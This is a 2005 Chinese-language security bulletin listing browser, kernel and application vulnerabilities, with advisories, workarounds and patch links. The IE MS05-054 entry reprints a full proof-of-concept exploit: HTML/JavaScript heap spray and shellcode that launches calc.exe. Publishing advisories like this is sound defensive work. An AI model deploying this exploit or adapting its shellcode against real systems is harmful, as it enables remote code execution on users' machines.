互联网安全公告20051210-20051216

一:系统漏洞

Microsoft IE java script OnLoad处理器远程执行代码漏洞(MS05-054)

Microsoft Internet Explorer COM对象实例化内存破坏漏洞（MS05-054）

Microsoft Internet Explorer文件下载对话框控制漏洞（MS05-054）

Microsoft Internet Explorer HTTPS代理信息泄露漏洞（MS05-054）  

Microsoft Windows异步过程调用本地权限提升漏洞（MS05-055）

Ethereal OSPF协议处理单元栈溢出漏洞

Mozilla Firefox历史文件缓冲区溢出漏洞  

Microsoft Excel内存破坏漏洞

Horde Nag远程HTML注入漏洞

Nortel SSL VPN跨站脚本/命令执行漏洞

Sights'N Sounds流媒体服务器sws.exe缓冲区溢出漏洞

NetGear RP114 SYN Flood拒绝服务漏洞

Alt-N MDaemon/WorldClient邮件标题拒绝服务漏洞  

SCO UnixWare UIDAdmin本地溢出漏洞  

二:安全信息

安全专家警告称新一轮Sober蠕虫攻击倒计时  

微软：感谢Google解决IE漏洞

思科路由器等非PC设备明年成黑客攻击重点  

微软发布12月安全补丁 修复两个严重IE漏洞

微软计划加强IE7安全性 防止恶意代码侵袭


Microsoft IE JavaScript OnLoad处理器远程执行代码漏洞(MS05-054)

发布日期：2005-05-28
更新日期：2005-12-13

受影响系统：
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 5.5 SP2
  - Microsoft Windows ME
Microsoft Internet Explorer 6.0
  - Microsoft Windows XP SP2
  - Microsoft Windows Server 2003 SP1
  - Microsoft Windows Server 2003
描述：
________________________________________
BUGTRAQ ID: 13799
CVE(CAN) ID: CVE-2005-1790

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

如果同<BODY onload>事件使用的话，IE就不能正确的初始化JavaScript "Window()"函数，导致Internet Explorer在试图调用ECX中引用的32位地址时会出现异常：

CALL DWORD [ECX+8]

由于这个漏洞，名为"OBJECT"文本字符串的Unicode表示可能无意中构成ECX，具体来说就是0x006F005B。由于0x006F005B偏移指向无效的或不存在的内存位置，因此Internet Explorer就无法处理，终端用户会遇到拒绝服务。

尽管这个漏洞无法导致控制任何内部寄存器和/或指向任何无法控制的偏移，但某些情况下可能会允许执行远程代码。

<*来源：Benjamin Tobias Franz （0-1-2-3@gmx.de）
    Stuart Pearson

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
    http://www.computerterrorism.com/research/ie/ct21-11-2005
    http://www.microsoft.com/technet/security/advisory/911302.mspx
    http://www.kb.cert.org/vuls/id/887861
    http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
    http://www.us-cert.gov/cas/techalerts/TA05-347A.html
*>

测试方法：
________________________________________
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<!--
Computer Terrorism (UK)

============================================

Microsoft Internet Explorer JavaScript Window() - Proof Of Concept

============================================

Author:
--------

Stuart Pearson
Computer Terrorism (UK)
www.computerterrorism.com
21st November, 2005


THE FOLLOWING PROOF OF CONCEPT IS PROVIDED EXCLUSIVELY FOR EDUCATIONAL
PURPOSES ONLY, AND IS PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
WARRANTY. IN PARTICULAR, NEITHER THE AUTHOR NOR COMPUTER TERRORISM
MAKES ANY REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE FITNESS
OF THIS CODE FOR ANY PARTICULAR PURPOSE.

PERMISSION TO USE, COPY, PRINT, AND DISTRIBUTE THIS DOCUMENT FOR EDUCATIONAL
PURPOSES IS HEREBY GRANTED, PROVIDED THAT THE TEXTUAL CONTENT REMAINS INTACT
AND UNMODIFIED.
-->

<html>

<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Computer Terrorism - Microsoft Internet Explorer Proof of Concept</title>
<script type="text/javascript">

function runpoc(iframecount)
{

document.getElementById('table1').rows[2].cells[0].innerHTML="<p align=center><B>
<font color=#339966 size=1 face=Arial>   loading, please wait....
</font></p>"
document.getElementById('table1').rows[4].cells[0].innerHTML=""
document.getElementById('table1').rows[6].cells[0].innerHTML=""
document.getElementById('table1').rows[7].cells[0].innerHTML=""
document.getElementById('table1').rows[9].cells[0].innerHTML=""


top.consoleRef = open('blankWindow.htm','BlankWindow',
'width=1,height=1'
+',menubar=0'
+',toolbar=1'
+',status=0'
+',scrollbars=0'
+',left=1'
+',top=1'
+',resizable=0')

top.consoleRef.blur();

top.consoleRef.document.writeln(
'<html>'
+'<head>'
+'<title>CT</title>'
+'</head>'
+'<body onBlur=self.blur()>'
+'</body></html>'
)

self.focus() // Ensure the javascript prompt boxes are hidden in the background


for (i=1 ; i <=iframecount ; i++)
{
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
src=fillmem.htm></iframe>')
}

if( iframecount == 8 ){
//alert('8');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
src=bug2k.htm></iframe>')
}

if( iframecount == 4 ){
//alert('4');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
src=bug.htm></iframe>')
}

//+'<iframe width=1 height=1 border=0 frameborder=0 src=bug.htm></iframe>'
//)



}
</script>
</head>

<body onLoad="self.moveTo(0,0);self.resizeTo(screen.width,screen.height);">

<p> </p>
<p> </p>

<table border="0" width="100%" id="table1">
<tr>
<td>
<p align="center"><font color="#333333"><b><font size="1" face="Arial">
Microsoft Internet Explorer JavaScript Window() Proof of Concept</font></b>
</font></td>
</tr>

<tr>
<td width="98%" height="15">
<p align="center"><b><font face="Arial" size="1" color="#333333">Select
your operating system:-</font></b></td>
</tr>
<tr>
<td width="98%" height="10"></td>
</tr>
<tr>
<td width="98%" height="27" align="center">
<p><b><font color="#339966" size="1" face="Arial">
-</font><font color="#333333"><font color="#333333" size="1" face="Arial"> </font> </font>
<font color="#333333" size="1" face="Arial"><a href="#" onclick="javascript:runpoc(4)">
<span style="text-decoration: none"><font color="#333333">Microsoft
Windows XP (All Service Packs)</font></span></a><font color="#333333"> </font></font>
<font color="#339966" size="1" face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="22" align="center">
<p><b><font color="#339966" size="1" face="Arial">
-</font><font color="#333333"><font color="#333333" size="1" face="Arial"> </font> </font>
<font color="#333333" size="1" face="Arial"><a href="#" onclick="javascript:runpoc(8)">
<span style="text-decoration: none"><font color="#333333">Microsoft
Windows 2000/Universal (Slower)</font></span></a><font color="#333333"> </font></font>
<font color="#339966" size="1" face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="15" align="center">
</td>
</tr>
<tr>
<td width="98%" height="15" align="center">
<b><font color="#339966" face="Arial" size="1">invokes calc.exe if
successful</font></b></td>
</tr>
</table>

</body>
</html>

--------------------------------------------------------------------------------------------------------------

<-- blankWindow.htm -->

<HTML>
<TITLE>Blank Window</title>
<body></body>
</html>

--------------------------------------------------------------------------------------------------------------

<--   fillmem.htm   -->

<HTML>
<HEAD>
<Script Language="JavaScript">
function load() {

var spearson=0
var eip = ""
var prep_shellcode = ""
var shellcode = ""
var fillmem = ""


//
// Address called by the bug (also serves as slide code)
//
for (spearson=1 ; spearson <=500 ; spearson++)
{
eip = eip + unescape("%u7030%u4300")
//eip = eip + unescape("%u4300")
}


//
// Create a large chunk for memory saturation
//
for (spearson=1 ; spearson <=200; spearson++)
{
fillmem = fillmem + eip
}

//
// Search for our shellcode (tagged with my initials) and copy to a more stable area
//
prep_shellcode = unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
"%u002d%ua5F3%u9090%u905f%ue7ff")

//
// Harmless Calc.exe
//
shellcode = unescape("%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF")


fillmem = fillmem + prep_shellcode + shellcode

prompt(fillmem,"Computer Terrorism (UK) Ltd - Internet Explorer Vulnerability")

}
// -->
</Script>
</head>
<TITLE>Windows Explorer Exploit</TITLE>
<body onload="setTimeout('load()',2000)">
test test test
</body>
</html>

--------------------------------------------------------------------------------------------------------------

<--   bug2k.htm   -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',20000)">

<SCRIPT>

function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT FACE=ARIAL SIZE 12PT>Please Wait !
</FONT></center>


--------------------------------------------------------------------------------------------------------------

<--   bug.htm   -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',6000)">

<SCRIPT>

function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT FACE=ARIAL SIZE 12PT>Please Wait !
</FONT></center>

建议：
________________________________________
临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 在IE选项菜单中禁用活动脚本。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS05-054）以及相应补丁:
MS05-054：Cumulative Security Update for Internet Explorer (905915)
链接：http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

Microsoft Internet Explorer COM对象实例化内存破坏漏洞（MS05-054）

发布日期：2005-12-13
更新日期：2005-12-13

受影响系统：
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 5.5 SP2
  - Microsoft Windows ME
Microsoft Internet Explorer 6.0
  - Microsoft Windows XP SP2
  - Microsoft Windows Server 2003 SP1
  - Microsoft Windows Server 2003
描述：
________________________________________
BUGTRAQ ID: 15827
CVE(CAN) ID: CAN-2005-2831

Microsoft Internet Explorer是非常流行的WEB浏览器。

Internet Explorer在处理某些COM对象时存在漏洞，远程攻击者可能在利用此漏洞在客户机上执行任意代码。

Internet Explorer试图为ActiveX控件初始化一些COM对象时，这些COM对象可能会破坏系统状态。这样攻击者就可以创建恶意的页面并诱骗用户访问来利用该漏洞。如果用户访问了恶意页面，就会导致执行任意代码。

<*来源：Will Dormann

链接：http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
    http://www.us-cert.gov/cas/techalerts/TA05-347A.html
*>

建议：
________________________________________
临时解决方法：

* 配置Internet Explorer在运行活动脚本前要求提示，或在Internet和本地intranet安全区中禁用活动脚本；

* 将Internet和本地intranet安全区设置为“高”；

* 将Web站点仅限为可信任的Web站点。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS05-054）以及相应补丁:
MS05-054：Cumulative Security Update for Internet Explorer (905915)
链接：http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

Microsoft Internet Explorer文件下载对话框控制漏洞（MS05-054）

发布日期：2005-12-13
更新日期：2005-12-13

受影响系统：
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 5.5 SP2
  - Microsoft Windows ME
Microsoft Internet Explorer 6.0
  - Microsoft Windows XP SP2
  - Microsoft Windows Server 2003 SP1
  - Microsoft Windows Server 2003
描述：
________________________________________
BUGTRAQ ID: 15823
CVE(CAN) ID: CAN-2005-2829

Microsoft Internet Explorer是非常流行的WEB浏览器。

Internet Explorer显示文件下载对话框和在与Web页面交互过程中接受用户输入的方法存在远程代码执行漏洞。

攻击者可以诱骗用户访问恶意的页面，如果访问了该页面的话就会在新的浏览窗口出现“文件下载”对话框。如果用户受骗双击了新窗口的特定区域的话，则该键盘动作就会传送给隐藏的“文件下载”对话框中的“运行”键，导致无意中运行攻击者所提供的程序。

<*来源：Jakob Balle （jb@secunia.com）
    Andreas Sandblad （sandblad@acc.umu.se）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113451052430212&w=2
    http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
    http://www.us-cert.gov/cas/techalerts/TA05-347A.html
*>

建议：
________________________________________
临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 配置Internet Explorer在运行活动脚本前要求提示，或在Internet和本地intranet安全区中禁用活动脚本；

* 将Internet和本地intranet安全区设置为“高”；

* 将Web站点仅限为可信任的Web站点。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS05-054）以及相应补丁:
MS05-054：Cumulative Security Update for Internet Explorer (905915)
链接：http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx


Microsoft Internet Explorer HTTPS代理信息泄露漏洞（MS05-054）

发布日期：2005-12-13
更新日期：2005-12-13

受影响系统：
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 5.5 SP2
  - Microsoft Windows ME
Microsoft Internet Explorer 6.0
  - Microsoft Windows XP SP2
  - Microsoft Windows Server 2003 SP1
  - Microsoft Windows Server 2003
描述：
________________________________________
BUGTRAQ ID: 15825
CVE(CAN) ID: CAN-2005-2830

Microsoft Internet Explorer是非常流行的WEB浏览器。

Internet Explorer与HTTPS代理的交互存在漏洞，远程攻击者可能利用此漏洞获取客户机相关的信息。

如果HTTPS代理服务器要求客户端使用Basic认证的话，则Internet Explorer运行的方式存在信息泄露漏洞，可能允许攻击者以明文读取从Internet Explorer发送给代理服务器的Web地址。

<*来源：Microsoft

链接：http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
    http://www.us-cert.gov/cas/techalerts/TA05-347A.html
*>

建议：
________________________________________
临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 不要使用需要Basic认证的认证代理服务器做为HTTPS通讯的代理。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS05-054）以及相应补丁:
MS05-054：Cumulative Security Update for Internet Explorer (905915)
链接：http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx



Microsoft Windows异步过程调用本地权限提升漏洞（MS05-055）

发布日期：2005-12-13
更新日期：2005-12-13

受影响系统：
Microsoft Windows 2000SP4
描述：
________________________________________
BUGTRAQ ID: 15826
CVE(CAN) ID: CAN-2005-2827

Microsoft Windows是微软发布的非常流行的操作系统。

Microsoft Windows处理异步过程调用（APC）队列列表的方式存在漏洞，本地攻击者可以利用此漏洞提供任意函数指针，劫持执行流，最终完全控制系统。

线程在退出的时候，PspExitThread会从ETHREAD.ApcState.ApcListHead[0]和ApcListHead[1]分离线程的APC队列，这样每个队列都会是一个循环的、双向链接的列表，其第一个和最后一个节点不指回到表头（LIST_ENTRY结构）。但是，由于没有修改表头的指针，因此其目的可能仅仅是允许PspExitThread中的APC释放循环，以便无需回到表头并错误的尝试释放ETHREAD结构中内存便可走过每个列表并释放其节点。攻击者可以利用这一过程释放数据，最终导致ExFreePoolWithTag操作用户内存。

外部进程所排列的APC会计算该进程的pool限额，因此包含有APC结构pool块的限额块会引用队列进程。如果正在退出线程的列表中包含有当前终止外部进程所排列的APC，且该APC节点代表进程的Process对象的最后引用，则释放该节点会导致在ExFreePoolWithTag中破坏Process对象，所造成的后果包括执行PspProcessDelete。这会使用KeStackAttachProcess切换到结束进程的地址空间，调用PspExitProcess。然后使用KeUnstackDetachProcess反转切换。

“attach”和“detach”函数都调用KiMoveApcState，其目的是临时分离其APC的线程，这样就不会分发到非预期的地址空间中，然后在线程的原始地址空间恢复后重新链接APC列表。在附加过程中，复制了ETHREAD.ApcState结构，并调整了列表的第一个和最后一个节点的指针以便引用拷贝。在分离的时候，尽管假设第一个和最后一个节点的指针仍是断开的（因为APC释放循环仍在进行），但调整了这些节点指针以重新将列表链接到原始的ETHREAD.ApcState。最终结果是释放循环仍会继续，尝试释放部分ETHREAD结构。由于所访问的ETHREAD部分中包含有可预测的且大部分为清零的值，因此最终会导致对攻击者提供指针的kernel操作。

以下过程说明了函数调用顺序和漏洞产生过程中所涉及到的参数：

. PspExitThread
. . KeFlushQueueApc
. . (detaches APC queues from ETHREAD.ApcState.ApcListHead)
. . (APC free loop begins)
. . ExFreePool(1st_APC -- queued by exited_process)
. . . ExFreePoolWithTag(1st_APC)
. . . . ObfDereferenceObject(exited_process)
. . . . . ObpRemoveObjectRoutine
. . . . . . PspProcessDelete
. . . . . . . KeStackAttachProcess(exited_process)
. . . . . . . . KiAttachProcess
. . . . . . . . . KiMoveApcState(ETHREAD.ApcState --> duplicate)
. . . . . . . . . KiSwapProcess
. . . . . . . PspExitProcess(0)
. . . . . . . KeUnstackDetachProcess
. . . . . . . . KiMoveApcState(duplicate --> ETHREAD.ApcState)
. . . . . . . . KiSwapProcess
. . ExFreePool(2nd_APC)
. . ExFreePool(ETHREAD + 30h)
. . (APC free loop ends)



<*来源：Derek Soeder （dsoeder@eeye.com）

链接：http://www.eeye.com/html/research/advisories/AD20051213.html
    http://www.microsoft.com/technet/security/bulletin/ms05-055.mspx
*>

建议：
________________________________________
厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS05-055）以及相应补丁:
MS05-055：Vulnerability in Windows Kernel Could Allow Elevation of Privilege (908523)
链接：http://www.microsoft.com/technet/security/bulletin/ms05-055.mspx

补丁下载：
http://www.microsoft.com/downloads/details.aspx?FamilyId=3832FF23-6B04-4CA2-80B9-D344B4CC98EA

Ethereal OSPF协议处理单元栈溢出漏洞

发布日期：2005-12-09
更新日期：2005-12-13

受影响系统：
Ethereal Group Ethereal <= 0.10.13
描述：
________________________________________
BUGTRAQ ID: 15794
CVE(CAN) ID: CVE-2005-3651

Ethereal是一款开放源码的网络协议分析工具。

Ethereal用于分析OSPF协议的组件中存在栈溢出漏洞，远程攻击者可以利用这个漏洞导致拒绝服务或执行任意代码。

dissect_ospf_v3_address_prefix()函数中没有执行边界检查。该函数可能将用户输入的二进制数据转换成可读字符串，但没有对输入数据执行长度检查便使用栈中固定长度的缓冲区来存储所创建的字符串。如果生成的输入长度超过了缓冲区大小，便可能出现堆溢出。


<*来源：iDEFENSE

链接：http://www.idefense.com/application/poi/display?id=349&type=vulnerabilities
    http://www.debian.org/security/2005/dsa-920
*>

建议：
________________________________________
临时解决方法：

* 在Ethereal中禁用OSPF报文处理单元。

厂商补丁：

Debian
------
Debian已经为此发布了一个安全公告（DSA-920-1）以及相应补丁:
DSA-920-1：New ethereal packages fix arbitrary code execution
链接：http://www.debian.org/security/2005/dsa-920

补丁下载：
Source archives:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14.dsc
Size/MD5 checksum:     681 fd2549fde25a12ea89ff76f16f476a1b
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14.diff.gz
Size/MD5 checksum:   46176 b28a169806ac6c7357bc59cb684ce067
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4.orig.tar.gz
Size/MD5 checksum: 3278908 42e999daa659820ee93aaaa39ea1e9ea

Alpha architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_alpha.deb
Size/MD5 checksum: 1941098 7ea04145418237e513e15021dc7f7b95
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_alpha.deb
Size/MD5 checksum:   334948 cef7bebe414cbf9d7ba06dded593e087
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_alpha.deb
Size/MD5 checksum:   223218 648d49081514871e244690c8d5f33691
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_alpha.deb
Size/MD5 checksum: 1708326 42b0e3d2014feb624df9b899ff620a0b

ARM architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_arm.deb
Size/MD5 checksum: 1635960 b04119f7705cf79e7172f1d18948fa8d
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_arm.deb
Size/MD5 checksum:   298554 3fd358c7da7eb738eb6873ef7af66d7f
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_arm.deb
Size/MD5 checksum:   207122 45c7b2fd84a7eb3e36e8d69ea9b6dcdf
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_arm.deb
Size/MD5 checksum: 1440018 9e3b3a723071fbd018ad3ac73183da68

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_i386.deb
Size/MD5 checksum: 1513538 b953ab41e1961c68629b925bbc56dd83
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_i386.deb
Size/MD5 checksum:   287406 5ef238518e168e5a46319493c15c4e19
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_i386.deb
Size/MD5 checksum:   199112 56c7fb6de85158b326b90488a0752cb1
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_i386.deb
Size/MD5 checksum: 1327200 3efaf5307fd7d6f34814e155caa33a7a

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_ia64.deb
Size/MD5 checksum: 2150464 14f206f1245e654828dc70458d7b6ec6
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_ia64.deb
Size/MD5 checksum:   373888 3e18fd820eaef70e178e1e54f35b163b
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_ia64.deb
Size/MD5 checksum:   234768 0e01b34d747883840309fbe0a82b9d90
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_ia64.deb
Size/MD5 checksum: 1862118 759d0b8533a34f25e2cd44e77b22b4c8

HP Precision architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_hppa.deb
Size/MD5 checksum: 1805078 e84cbe1d3502ddaf4d34e3a969a14736
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_hppa.deb
Size/MD5 checksum:   323354 37c86ac01668a204d7808a9fdcbb81be
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_hppa.deb
Size/MD5 checksum:   217748 a9a0acb50c691d7bc451cfae45c9d51e
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_hppa.deb
Size/MD5 checksum: 1576466 8c1be59eac51ed8a610285a15a058e22

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_m68k.deb
Size/MD5 checksum: 1425116 544e1f11c2d772762396cf4d50cc93b8
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_m68k.deb
Size/MD5 checksum:   283738 77f3c1a0ee662058b9e55cafe1d1ae7c
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_m68k.deb
Size/MD5 checksum:   196008 b0dfb3b8d3d1e37c6a077930ea3dbf3b
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_m68k.deb
Size/MD5 checksum: 1249126 60a2d75460899934f40c2ea649c7bf7d

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_mips.deb
Size/MD5 checksum: 1617300 8538bf50fd13015ec371a625f8eaeae7
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_mips.deb
Size/MD5 checksum:   306118 7efffa6fb386ddda82d2669ffc575db4
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_mips.deb
Size/MD5 checksum:   214658 189f2f3621ebde6a7455bc2be6e09c3e
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_mips.deb
Size/MD5 checksum: 1422282 9b066162a09a3c53d82f5c9463fe239b

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_mipsel.deb
Size/MD5 checksum: 1598586 6ed002e3b9d37f57b3cb782270ae26cb
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_mipsel.deb
Size/MD5 checksum:   305606 557d7ecf335f4f60f57e6e2483a81888
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_mipsel.deb
Size/MD5 checksum:   214304 cd62dba02317002a5d78472b18c9603b
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_mipsel.deb
Size/MD5 checksum: 1406756 b106a0b8c8ab20d663c342367a556a5e

PowerPC architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_powerpc.deb
Size/MD5 checksum: 1618532 c41f2a97a6853433772f5f2a0c8e32de
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_powerpc.deb
Size/MD5 checksum:   302842 245c32c2385672854ea654206a6a0db7
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_powerpc.deb
Size/MD5 checksum:   209956 8336298c3c08e4213c617f4fb9922dcf
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_powerpc.deb
Size/MD5 checksum: 1419734 1bd2b78f8a25b9da6f70c3f05b580be3

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_s390.deb
Size/MD5 checksum: 1575174 54dc9af554d9b748a1e3ff7d9e805f1a
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_s390.deb
Size/MD5 checksum:   301632 dedef85bb14b6b45f92085f90314034d
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_s390.deb
Size/MD5 checksum:   205000 b6200c4c1f9015261a7ac43ac6c43252
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_s390.deb
Size/MD5 checksum: 1388014 45b14ef2e45ab75949227acc26878b6b

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody14_sparc.deb
Size/MD5 checksum: 1583708 acfac4316a7e5a71158bb25af5689293
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody14_sparc.deb
Size/MD5 checksum:   318896 aca734b7ec2a1d7f631159b568b8b999
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody14_sparc.deb
Size/MD5 checksum:   205782 2a5a107881b218d3adf4662578a1a108
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody14_sparc.deb
Size/MD5 checksum: 1389940 7b383ffec5230f7766935089fcff0e0e


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4.dsc
Size/MD5 checksum:     855 29cbef6699e9e51ae35c4745b978c1e4
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4.diff.gz
Size/MD5 checksum:   167246 2230337a164906c33ca978abc5b57c65
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10.orig.tar.gz
Size/MD5 checksum: 7411510 e6b74468412c17bb66cd459bfb61471c

Alpha architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_alpha.deb
Size/MD5 checksum:   541818 a6c44210b359d74ed16ed23fe386759d
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_alpha.deb
Size/MD5 checksum: 5474866 5924bfdf784578df4dd2df46392d2a0c
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_alpha.deb
Size/MD5 checksum:   153864 e687ab4c0c2dec8d62065d18484fadce
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_alpha.deb
Size/MD5 checksum:   105162 431908b433045153e7360c53bde3e900

AMD64 architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_amd64.deb
Size/MD5 checksum:   485392 16a454068f8ce4997d7df6808d66b64b
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_amd64.deb
Size/MD5 checksum: 5334066 79eeb45de736a575fcbfdc7e40fd0083
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge4_amd64.deb
Size/MD5 checksum:   153864 980cd2da44c4d1bc32ae6336acb2c79f
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge4_amd64.deb
Size/MD5 checksum:   98444 08817a1f964ab391ffec8da425020572

ARM architecture:

http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge4_arm.deb
Size/MD5 checksum:   471758 37774606d0d4d050dece6b73907a9885
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge4_arm.deb
